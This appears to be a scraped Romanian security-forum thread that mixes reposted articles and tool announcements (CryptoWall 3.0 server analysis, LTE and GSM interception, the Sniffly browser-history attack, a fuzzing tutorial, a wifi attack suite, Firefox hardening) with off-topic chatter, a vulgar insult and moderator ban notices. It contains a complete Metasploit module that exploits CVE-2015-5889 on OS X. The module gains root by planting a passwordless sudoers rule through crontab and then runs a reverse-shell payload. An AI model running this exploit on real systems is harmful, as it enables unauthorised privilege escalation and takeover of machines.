system information, we saw that the ISP TrustInfo has 3 subnets. We decided to investigate further in those subnets, searching for servers that had the same ports open with the same version of services. For instance, we looked for hosts that had port 22 with OpenSSH version 6.0 responding to the criteria and port 80 with NGINX 1.2.1. One subnet in particular, 95.128.180.0/22 had a lots of hosts responding to this criteria.After verifying each of them, by establishing if the page http://ip/server-status/ showed us the same TOR address and had the same uptime, we found 9 more servers than the two previously discovered: CryptoWall 3.0 architectureThus, motherships servers are playing at least two roles: forwarding the requests of infected victims and supporting the TOR website to pay the ransom. Since NGINX is installed on all of them, and they all refer to the same Apache server, they seem to serve only as a gateway, so that makes us believe that the secrete keys are stored elsewhere, well kept away from us.By comparing all the different requests made on the server status page, some GET requests got our attention. This lead us to a login page on this same server: At first look, it seems to be the management page for the owners of CryptoWall. This page seems to be custom made. They are doing basic authentication with a username and a password. The password is hashed in MD5 client-side before being passed by the POST request to the server. After 3 failed attempts, the system refuses any more try’s. It is however possible to reset the number of failed attempts by deleting the PHPSESSID cookie. However, we don’t know what this page provides access to.After monitoring the status page, we also did some statistics: Request type received by the server CPU load over time Total access requests to the server over time At its peak, the server behind the proxy has processed almost 44 GB of data in 30 daysProtection against ransomware In order to protect computers against all types of viruses, there should always be a minimum of an updated antivirus. However, in this research we saw many samples that weren’t detected by any antivirus on VirusTotal. In these cases, email attachment filters are really useful, because a lot of the infection is coming from this vector. Also, limiting the advertising when surfing the internet with a proxy (to avoid the malvertising, which can exploit other vulnerabilities) and using an IPS will help. Blocking servers that infected computers will contact is not very effective, because they change very often and the payload normally knows multiples websites to contact.Some other methods may be useful if you want to be alerted by a new infected computer making requests. You can make a rule in your firewall that alerts you when someone visits http://ip-addr.es, which is used every time by CryptoWall to gather the external IP address. Other ransomware also use this technique but with various websites. There is also a way to be alerted by your SAN by watching the I/O by users. In fact, computers infected by a ransomware will try to encrypt network drives aggressively, which can be detected by looking at the number of transactions in a certain time frame.You can also block the execution of a program in the temporary directory of windows. There is no reason why a program should start from there, and it is often used by malware. This procedure will show you how to create GPOs to do that.You should however be prepared no matter what and have backups for your systems. Conclusion Given that all motherships servers seem to have the same configuration, they are probably deployed automatically from a template by the attacker. Moreover, the fact that we see new infected WordPress with CryptoWall 3.0 almost each week demonstrates the organization of the attacker, because this also implies that they must update the ransomware each time so that the malware has the right URLs to contact.This whole process is well structured, it evolves to avoid being detected and seems to have become the new trend for hackers to make money. Other aspects of the ransomware would have been interesting to investigate, but because of the lack of time we didn’t go any further.Feel free to contact me for any questions, suggestions or comment at malware @ brillantit.com References: Intel TALOS Vallejo Sentinel One TrendMicro SecureWorks Sursa: http://blog.brillantit.com/?p=15

Daca era ziua lui Steve Jobs, sareati de cur in sus si il pupati pe pula. Omul asta a ajutat lumea. https://en.wikipedia.org/wiki/Bill_%26_Melinda_Gates_Foundation

Low-cost IMSI catcher for 4G/LTE networks tracks phone’s precise locations $1,400 device can track users for days with little indication anything is amiss. by Dan Goodin - Oct 28, 2015 2:59pm EET Researchers have devised a low-cost way to discover the precise location of smartphones using the latest LTE standard for mobile networks, a feat that shatters widely held perceptions that it's immune to the types of attacks that targeted earlier specifications. The attacks target the LTE specification, which is expected to have a user base of about 1.37 billion people by the end of the year. They require about $1,400 worth of hardware that run freely available open-source software. The equipment can cause all LTE-compliant phones to leak their location to within a 32- to 64-foot (about 10 to 20 meter) radius and in some cases their GPS coordinates, although such attacks may be detected by savvy phone users. A separate method that's almost impossible to detect teases out locations to within an area of roughly one square mile in an urban setting. GSM networks leak unique identifiers of cellphones for anyone to see. A team … The researchers have devised a separate class of attacks that causes phones to lose connections to LTE networks, a scenario that could be exploited to silently downgrade devices to the less secure 2G and 3G mobile specifications. The 2G, or GSM, protocol has long been known to be susceptible to man-in-the-middle attacks using a form of fake base station known as an IMSI catcher (like the Stingray). 2G networks are also vulnerable to attacks thatreveal a phone's location within about 0.6 square mile. 3G phones suffer from a similar tracking flaw. The new attacks, described in a research paper published Monday, are believed to be the first to target LTE networks, which have been widely viewed as more secure than their predecessors."The LTE access network security protocols promise several layers of protection techniques to prevent tracking of subscribers and ensure availability of network services at all times," the researchers wrote in the paper, which is titled "Practical attacks against privacy and availability in 4G/LTE mobile communication systems." "We have shown that the vulnerabilities we discovered in LTE access network security protocols lead to new privacy and availability threats to LTE subscribers." Like some of its predecessors, LTE attempts to conceal the location of a specific phone by assigning it a regularly changing TMSI, short for a temporary mobile subscriber identity. When a network interacts with a handset, it will address it by its TMSI rather than by its phone number or other permanent identifier to prevent attackers monitoring network traffic from tracking the location of a given user. The 2G attack worked around this scheme by sending phones an invisible text message or imperceptibly brief call that caused the mobile network locate the phone. That paging request allowed the researchers to tie the TMSI to the phone number. Passive aggression versus evolved NodeB The researchers behind the LTE attack found that similar paging requests can be triggered by social messaging apps such as those provided by Facebook, WhatsApp, and Viber with little or no indication to the owner that any tracking is taking place. A Facebook message sent by someone not in the receiver's friend list, for instance, will cause the text to be silently diverted to a folder marked "other." But behind the scenes, an attacker can use the data sent over the network to link the receiver's Facebook profile to the TMSI. The TMSI, in turn, can be used to locate the phone and track it as it moves from place to place. A text sent through Whatsapp or Viber, meanwhile, first must be returned by the targeted phone owner. From then on, the attacker can use the apps' typing notification feature to trigger paging requests. The researchers describe such exploits as "semi-passive" because they mainly involve the passive monitoring of network traffic, rather than the impersonation and traffic manipulation found a in a fully active man-in-the-middle attack. Attackers can also opt to launch far more accurate active attacks by operating a rogue base station, which in LTE parlance is known as an eNodeB, short for evolved NodeB. To create their own eNodeB, the researchers used a computer-controlled radio known as a Universal Software Radio Peripheral that ran OpenLTE, an open-source implementation of the official LTE specification. The total cost of the gear, including the the radio board and antennas, was about €1,250 (about $1,400), Ravishankar Borgaonkar, one of the researchers and a post-doctorate student at Aalto University in Finland, told Ars. When running in active mode, the eNodeB impersonates an official base station provided by a network carrier and forces LTE phones to connect to it. The attackers can then run trouble-shooting routines that cause the handset to provide a wealth of information, including all nearby base stations and the signal strength of each one. Attackers can use the data to triangulate the precise location of the device. In some cases, the rogue eNodeB can be used to obtain the GPS coordinates of the phone. An exclusive first look at Pwnie's new tool for catching cellular network attacks. While the active attack provides much more granular location data, it comes at a cost. Darshak, an IMSI-catcher detection app that was released at the 2014 Blackhat security conference in Las Vegas, as well as similar apps from Pwnie Express and others can easily detect the full-on attacks. That means the semi-passive attacks may be preferable for many attackers, even though the location data is coarser.There's another feature that makes the semi-passive attacks attractive: At least one of the LTE networks the researchers studied allowed TMSIs to last as long as three days before being changed. That means an attacker who executed such an attack could use it to track a target's comings and goings for days with an accuracy of about a half mile. While it's likely the messaging apps will try to make changes that thwart the attack, it wouldn't be surprising if there are other ways to trigger the paging requests. But wait... there’s more The paper includes a separate attack that prevents phones from connecting to LTE networks. Such an attack would either prevent a phone from receiving voice or data service, or it would cause the devices to connect using 3G or even 2G technology, which are vulnerable to other types of exploits. In any event, the denial-of-service attacks are generally effective until after a device is rebooted. The researchers also included Altaf Shaik, a doctoral student at Technische Universität Berlin; N. Asokan of Aalto University and University of Helsinki; Valtteri Niemi of the University of Helsinki; and Jean-Pierre Seifert, a professor at Technische Universität Berlin. They said they contacted all manufacturers and carriers affected by their research in June and July and have proposed several changes they can make to better secure their products and networks. The researchers are scheduled to present their findings at the upcoming Blackhat Security conference in Amsterdam, theT2 Security conference 2015, and the Internet Society NDSS conference. A brief description of the attacks is here. As noted earlier, several of the vulnerabilities exploited reside in the LTE specification itself. That likely means every LTE-compatible manufacturer and carrier is vulnerable to these attacks. A fix will almost certainly take time and money, but at least there will be near unanimous agreement among industry partners that the weaknesses represent a concrete and imminent threat to customers. Sursa: http://arstechnica.com/security/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/

Eu am citit "C++ - Manual complet - Herbert Schildt". M-a ajutat. Poti incerca: "Limbajele C si C++ pentru incepatori - Negrescu Liviu" Iar pentru avansati recomand: "Secrete C++ - Constantin Galatan"

[h=1]The Bug Hunters Methodology[/h] Welcome! This repo is a conglomeration of tips, tricks, tools, and data analysis to use while doing web application security assessments, and more specifically towards bug hunting in bug bounties. These methodology pieces are presented as an abbreviated testing methodology for use in bug bounties. It is based off of the research gathered for the Defcon 23 talk "How to shot Web: better hacking in 2015". The current sections are divided as follows: philosophy discovery mapping tactical fuzzing XSS SQLi LFI CSRF web services mobile vulnerabilities The goal of the project is to incorporate more up to date resources for bug hunters and web hackers to use during thier day-to-day work. @jhaddix [h=2]Defcon Video[/h]Link: https://drive.google.com/file/d/0B15XPa08CyxhQ1J2T2tOUUJuSFk/view Sursa: https://github.com/jhaddix/tbhm

Nu va chinuiti sa mai postati, nu mai permitem: 1. root-uri 2. cPanels 3. VNC-uri 4. SMTP-uri ... Cu alte cuvinte: nu se mai vand/cumpara lucruri furate (sparte).

HACKING GSM SIGNALS WITH AN RTL-SDR AND TOPGUW The ability to hack some GSM signals has been around for some time now, but the steps to reproduce the hack have been long and difficult to set up. Recently RTL-SDR.com reader Bastien wrote into us to let us know about his recently released project called Topguw. Bastien’s Topguw is a Linux based program that helps piece together all the steps required in the GSM hacking process. Although the steps are simplified, you will still need some knowledge of how GSM works, have installed Airprobe and Kraken, and you’ll also need a 2TB rainbow table which keeps the barrier to this hack still quite high. Bastien writes about his software: So like I said my software can “crack” SMS and call over GSM network. How ? I put quotation marks in crack because my software is not enough to deciphered GSM itself. My software can make some steps of the known-plaintext attack, introduce by Karsten Nohl, and by the way, increase the time to decipher an SMS or call. I’ll not explain here all the steps because they are long and tedious, but there is a lot of work done behind the Gui. Actually my software can extract Keystream (or try to find some of them) from a capture file of GSM, or by sniffing GSM with a rtl-sdr device. Then you just have to use Kraken to crack the key and you’re able to decipher sms or call. Why ? This hack is very interesting! With only a little receiver (rtl-sdr) and some hard-disk capacity (2Tb), everyone can try to hack the GSM. It’s very low cost compare to other hack vector. Moreover the success rate is really great if you guess the Keystream correctly. So when I started to done this with my hands I though -> why don’t try to make something to do this automatically. This is how Topguw was born. Topguw, I hope, will sensitize people about risk they take by calling or sending sms with GSM. My software is currently in beta version but I did run several time and I got good results. Maybe better than something done by hand. But Topguw is made to help people who want to learn the hack. This is why several files are made to help GSM reverse-engineering. Topguw can be downloaded from GitHub at https://github.com/bastienjalbert/topguw. Bastien has also uploaded a video showing his software in action. If you’re interested in Bastiens YouTube channel as he plans to upload another video soon where he shows himself hacking his own GSM sms/call signals. Of course remember that hacking into GSM signals is very illegal and if you do this then you must check the legality of doing so in your country and only receive your own messages or messages that are intended for you. Sursa: Hacking GSM Signals with an RTL-SDR and Topguw - rtl-sdr.com

Sniffly Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome. More info available in my ToorCon 2015 slides:https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf. Demo Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them). How it works I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version: User visits Sniffly page Browser attempts to load images from various HSTS domains over HTTP Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerrorhandler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain. Finding HSTS hosts To scrape an included list of sites (util/strict-transport-security.txt, courtesy Scott Helme) to determine which hosts send HSTS headers, do: $ cd util $ ./run.sh <number_of_batches> > results.log where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want. To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded: $ cd util $ ./process.py <results_file> > processed.log Once that's done, you can copy the hosts from processed.log into src/index.js. Running sploitz Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this: server { listen 8081; server_name localhost; location / { root /path/to/sniffly/src; add_header Content-Security-Policy "img-src http:"; index index.html; } } Or in .htaccess: <IfModule mod_headers.c> Header set Content-Security-Policy "img-src http:" </IfModule> Or send the header via php. Paste this at the start of the script (and change the name to index.php): <?php $csp_rules = "img-src http:"; // Just to ensure maximum compatibility header('X-WebKit-CSP: '.$csp_rules); header('X-Content-Security-Policy: '.$csp_rules); header('Content-Security-Policy: '.$csp_rules); ?> Caveats Not supported yet in Safari, IE, or Chrome on iOS. Extensions such as HTTPS Everywhere will mess up results. Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100-millisecond. Users with a different HSTS preload list (ex: due to having an older browser) may not see accurate results. Acknowledgements Scott Helme for an initial list of HSTS hosts that he had found so I didn't have to scan the entire Alexa 1M. Chris Palmer for advising on how to file a privacy bug in Chrome. Dan Kaminsky and WhiteOps for sponsoring the ToorCon trip where this was presented. Jan Schaumann and Chris Rohlf for being early testers. Everyone who let me sleep on their couch while I did this over my "vacation break". You know who you are! Sursa: https://github.com/diracdeltas/sniffly

Tutorial - Beginner's Guide to Fuzzing Part 1: Simple Fuzzing with zzuf Part 1: zzuf ?? Part 2: Address Sanitizer ?? Part 3: american fuzzy lop The goal of this tutorial is to get the message out that fuzzing is really simple. Many free software projects today suffer from bugs that can easily be found with fuzzing. This has to change and I hope we can make fuzzing an integral part of most project's development process. What fuzzing does is that we feed an application with a large number of malformed inputs and look for undesired behaviour, e. g. crashes. We usually do this by taking a valid input and add random errors to it. Promising fuzzing targets are tools that provide parsers for a large number of exotic file formats. Let's take ImageMagick as an example. It's a set of command line tools that process images in a large number of file formats. How do we fuzz it? We start by generating some input samples. It's usually a good idea to fuzz with small files, so first we create a simple image in any format with small dimensions, e.g. a 3x3 pixel PNG. We'll name that example.png Now we convert that into various other file formats. In this case you can just use ImageMagick itself or more precisely the tool convert that is part of ImageMagick to create your example files: convert example.png example.gif convert example.png example.xwd convert example.png example.tga Use as many as you like (convert -list format will show you all supported formats). Now we need malformed versions of these example files. Here we start using the tool zzuf. It's a simple fuzzing tool and is available in most Linux distributions. Articol complet: https://fuzzing-project.org/tutorial1.html

Infernal Twin – Automatic Wifi Hacking Tool Infernal Twin is an automatic wifi hacking tool, basically a Python suite created to aid penetration testers during wireless assessments, it automates many of the common attacks – which can get complicated and hard to manage when executed manually. The author noticed a gap in the market with there being many tools to automate web application testing and network pen-tests, but nothing really aimed at Wifi apart from some commercial tools. So this is an attempt to create a ‘1-click’ style wifi attack tool – something likeMetasploit. A framework with a whole bunch of different attack vectors bundled together in one interface. Features WPA2 hacking WEP Hacking WPA2 Enterprise hacking Wireless Social Engineering SSL Strip Evil Access Point Creation Infernal Wireless Report generation PDF Report HTML Report Note taking function Data is saved into Database Network mapping MiTM Probe Request The tool leverages the work done on other utilities to avoid reinventing the wheel, popular wifi security tools such as aircrack-ng and SSLStrip. You can download Infernal Twin here: infernal-twin-master.zip Or read more here. Sursa: http://www.darknet.org.uk/2015/10/infernal-twin-automatic-wifi-hacking-tool/

Mac OS X 10.9.5 / 10.10.5 rsh/libmalloc Privilege Escalation Authored by rebel, shandelman116 | Site metasploit.com This Metasploit module writes to the sudoers file without root access by exploiting rsh and malloc log files. Makes sudo require no password, giving access to su even if root is disabled. Works on OS X 10.9.5 to 10.10.5 (patched on 10.11). ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::OSX::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation', 'Description' => %q{ This module writes to the sudoers file without root access by exploiting rsh and malloc log files. Makes sudo require no password, giving access to su even if root is disabled. Works on OS X 10.9.5 to 10.10.5 (patched on 10.11). }, 'Author' => [ 'rebel', # Vulnerability discovery and PoC 'shandelman116' # Copy/paste AND translator monkey ], 'References' => [ ['EDB', '38371'], ['CVE', '2015-5889'] ], 'DisclosureDate' => 'Oct 1 2015', 'License' => MSF_LICENSE, # Want to ensure that this can be used on Python Meterpreter sessions as well 'Platform' => ['osx', 'python'], 'Arch' => [ARCH_X86_64, ARCH_PYTHON], 'SessionTypes' => ['shell', 'meterpreter'], 'Privileged' => true, 'Targets' => [ ['Mac OS X 10.9.5-10.10.5', {}] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' } )) register_options( [ OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]), OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes']) ], self.class ) end def exploit # Check OS os_check # Check if crontab file existed already so it can be restored at cleanup if file_exist? "/etc/crontab" @crontab_original = read_file("/etc/crontab") else @crontab_original = nil end # Writing payload if payload.arch.include? ARCH_X86_64 vprint_status("Writing payload to #{payload_file}.") write_file(payload_file, payload_source) vprint_status("Finished writing payload file.") register_file_for_cleanup(payload_file) elsif payload.arch.include? ARCH_PYTHON vprint_status("No need to write payload. Will simply execute after exploit") vprint_status("Payload encodeded is #{payload.encoded}") end # Run exploit sploit # Execute payload print_status('Executing payload...') if payload.arch.include? ARCH_X86_64 cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown") elsif payload.arch.include? ARCH_PYTHON cmd_exec("python -c \"#{payload.encoded}\" & disown") end vprint_status("Finished executing payload.") end def os_check # Get sysinfo sysinfo = get_sysinfo # Make sure its OS X (Darwin) unless sysinfo["Kernel"].include? "Darwin" print_warning("The target system does not appear to be running OS X!") print_warning("Kernel information: #{sysinfo['Kernel']}") return end # Make sure its not greater than 10.5 or less than 9.5 version = sysinfo["ProductVersion"] minor_version = version[3...version.length].to_f unless minor_version >= 9.5 && minor_version <= 10.5 print_warning("The target version of OS X does not appear to be compatible with the exploit!") print_warning("Target is running OS X #{sysinfo['ProductVersion']}") end end def sploit user = cmd_exec("whoami").chomp vprint_status("The current effective user is #{user}. Starting the sploit") # Get size of sudoers file sudoer_path = "/etc/sudoers" size = get_stat_size(sudoer_path) # Set up the environment and command for spawning rsh and writing to crontab file rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")" rb_cmd = "ruby -e '#{rb_script}'" # Attempt to execute print_status("Attempting to write /etc/crontab...") cmd_exec(rb_cmd) vprint_status("Now to check whether the script worked...") # Check whether it worked crontab = cmd_exec("cat /etc/crontab") vprint_status("Reading crontab yielded the following response: #{crontab}") unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL" vprint_error("Bad news... it did not write to the file.") fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.") end print_good("Succesfully wrote to crontab file!") # Wait for sudoers to change new_size = get_stat_size(sudoer_path) print_status("Waiting for sudoers file to change...") # Start timeout block begin Timeout.timeout(datastore['WaitTime']) { while new_size <= size Rex.sleep(1) new_size = get_stat_size(sudoer_path) end } rescue Timeout::Error fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.") end print_good("Sudoers file has changed!") # Confirming root access print_status("Attempting to start root shell...") cmd_exec("sudo -s su") user = cmd_exec("whoami") unless user.include? "root" fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}") end print_good("Success! Acquired root access!") end def get_stat_size(file_path) cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'" response = cmd_exec(cmd) vprint_status("Response to stat size query is #{response}") begin size = Integer(response) return size rescue ArgumentError fail_with(Failure::UnexpectedReply, "Could not get stat size!") end end def payload_source if payload.arch.include? ARCH_X86_64 return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) elsif payload.arch.include? ARCH_PYTHON return payload.encoded end end def payload_file @payload_file ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}" end def cleanup vprint_status("Starting the cron restore process...") super # Restore crontab back to is original state # If we don't do this, then cron will continue to append the no password rule to sudoers. if @crontab_original.nil? # Erase crontab file and kill cron process since it did not exist before vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.") rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?") if rm_ret.chomp.to_i == 0 vprint_good("Successfully removed crontab file!") else print_warning("Could not remove crontab file.") end Rex.sleep(1) kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?") if kill_ret.chomp.to_i == 0 vprint_good("Succesfully killed cron!") else print_warning("Could not kill cron process.") end else # Write back the original content of crontab vprint_status("Restoring crontab file back to original contents. No need for it anymore.") cmd_exec("echo '#{@crontab_original}' > /etc/crontab") end vprint_status("Finished the cleanup process.") end end Sursa: https://packetstormsecurity.com/files/134087/rsh_libmalloc.rb.txt

Run-DMA Authors: Michael Rushanan and Stephen Checkoway, Johns Hopkins University Open Access Content USENIX is committed to Open Access to the research presented at our events. Papers and proceedings are freely available to everyone once the event begins. Any video, audio, and/or slides that are posted after the event are also free and open to everyone. Support USENIX and our commitment to Open Access. Rushanan PDF View the slides BibTeX Abstract: Copying data from devices into main memory is a computationally-trivial, yet time-intensive, task. In order to free the CPU to perform more interesting work, computers use direct memory access (DMA) engines—a special-purpose piece of hardware—to transfer data into and out of main memory. We show that the ability to chain together such memory transfers, as provided by commodity hardware, is sufficient to perform arbitrary computation. Further, when hardware peripherals can be accessed via memory-mapped I/O, they are accessible to "DMA programs." To demonstrate malicious behavior, we build a proof-of-concept DMA rootkit that modifies kernel objects in memory to perform privilege escalation for target processes. Sursa: https://www.usenix.org/conference/woot15/workshop-program/presentation/rushanan

Weird New Tricks for Browser Fingerprinting yan (@bcrypt) ToorCon 2015 Tracking web users is all the rage Show ads! Inject QUANTUM malware Cybercatch cybercriminals Gather website analytics Detect fraud / droidnets Enforce paywalls etc. Download: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf

[h=1]CppCon 2015: Bjarne Stroustrup “Writing Good C++14”[/h] Publicat pe 23 sept. 2015 cppcon | The C++ Conference -- Presentation Slides, PDFs, Source Code and other presenter materials are available at: https://github.com/isocpp/CppCoreGuid... -- How do we use C++14 to make our code better, rather than just different? How do we do so on a grand scale, rather than just for exceptional programmers? We need guidelines to help us progress from older styles, such as “C with Classes”, C, “pure OO”, etc. We need articulated rules to save us from each having to discover them for ourselves. Ideally, they should be machine-checkable, yet adjustable to serve specific needs. In this talk, I describe a style of guidelines that can be deployed to help most C++ programmers. There could not be a single complete set of rules for everybody, but we are developing a set of rules for most C++ use. This core can be augmented with rules for specific application domains such as embedded systems and systems with stringent security requirements. The rules are prescriptive rather than merely sets of prohibitions, and about much more than code layout. I describe what the rules currently cover (e.g., interfaces, functions, resource management, and pointers). I describe tools and a few simple classes that can be used to support the guidelines. The core guidelines and a guideline support library reference implementation will be open source projects freely available on all major platforms (initially, GCC, Clang, and Microsoft). -- Videos Filmed & Edited by Bash Films: Bash Films | Award-Winning Video Production

[h=1]Firefix: Hardening Firefox for Privacy[/h] While Tor officially recommends using their Tor-hardened version of Firefox, it doesn’t come without its share of problems, including forensic artifacts, as well as other potential vulnerabilities. As the Tor browser is not often updated as quickly as Firefox itself, one may find benefit in using tor with the latest version of firefox… Running tor apart from the browser isn’t difficult, and the Tor command-line client can be easily installed on most operating systems either through package managers (such as Macports) or by compiling from sources. With Tor running in a terminal window, Firefox can be easily made to proxy through it. For example: network.proxy.socks = “127.0.0.1” network.proxy.socks_port = 9050 network.proxy.socks_remote_dns = true network.proxy.type = 1 One of the benefits to running Tor yourself are the ability to use other applications (other than a browser) with it, by using a popular tool named torsocks, which can proxy many applications through Tor easily. Back to Firefox, if you’re going to use the official version of the browser, there are a number of configuration fixes you’ll want to make to protect your privacy. In addition to hardening Firefox, it’s always a good idea to install a local firewall such as Little Snitch, and create a profile that blocks all outgoing traffic on your machine, except for Tor traffic. Alternatively, there is also a personal onion router project to create a dedicated router. Of course, you don’t need to be running Tor to want to harden Firefox. There are a number of other benefits to hardening Firefox as well: to reduce the exposure of your personal information as you browse, to reduce the forensic artifacts left behind on your machine, and to reduce your attack surface, to name a few. Here is a good list to start of features in Firefox that should be changed that will help improve privacy. NOTE: Use at your own risk. I make no warranties about any of this. accessibility.typeaheadfind.flashBar = 0 app.update.auto = false app.update.disable_button.showUpdateHistory = false browser.privatebrowsing.autostart = true browser.sessionstore.restore_on_demand = false browser.shell.checkDefaultBrowser = false browser.tabs.loadInBackground = false datareporting.healthreport.uploadEnabled = false datareport.healthreport.service.enabled = false dom.ipc.plugins.flash.subprocess.crashreporter.enabled = false dom.ipc.plugins.reportCrashURL = false dom.w3c_touch_events.expose = false media.peerconnection.enabled = false media.peerconnection.video.enabled = false network.cookie.cookieBehavior = 1 network.websocket.enabled = false pdfjs.previousHandler.alwaysAskBeforeHandling = true pdfjs.previousHandler.preferredAction = 4 places.history.enabled = false plugins.notifyMissingFlash = false pref.downloads.disable_button.edit_actions = false security.ssl3.ecdhe_ecdsa_rc4_128_sha = false security.ssl3_ecdhe_rsa_rc4_128_sha = false security.ffl3.rsa_rc4_128_md5 = false security.ssl3_rsa_rc4_128_sha = false security.ssl3.rsa_des_ede3_sha = false security.ssl.require_safe_negotiation = true security.ssl.treat_unsafe_negotiation_as_broken = true security.tls.version.min = 1 browser.formfill.enable = false browser.cache.disk.enable = false browser.cache.disk_cache_ssl = false browser.cache.offline.enable = false dom.event.clipboardevents.enabled = false geo.enabled = false network.cookie.lifetimePolicy = 2 network.dnsCacheExpiration = 0 network.dnsCacheEntries = 0 browser.urlBar.matchBehavior = 2 browser.sessionstore.restore_on_demand = false browser.sessionstore.resume_from_crash = false browser.sessionstore.enabled = false browser.sessionhistory.max_entries = 0 layout.spellcheckDefault = 0 browser.newtabpage.directory.ping = "" browser.newtabpage.directory.source = "" browser.newtabpage.enabled = false browser.newtabpage.enhanced = false browser.search.suggest.enabled = false datareporting.policy.dataSubmissionEnabled = false dom.storage.enabled = false network.prefetch-next = false plugin.state.flash = 0 plugin.state.quicktime = 0 plugin.state.silverlight = 0 plugins.click_to_play = true browser.sesssionstore.privacy_level = 2 browser.sessionstore.privacy_level_deferred = 2 privacy.trackingprotection.enabled = true toolkit.telemetry.enabled = false extensions.getAddons.cache.enabled = false extensions.blocklist.enabled = false Sursa: Firefix: Hardening Firefox for Privacy | Zdziarski's Blog of Things

Ban permanent amandoi.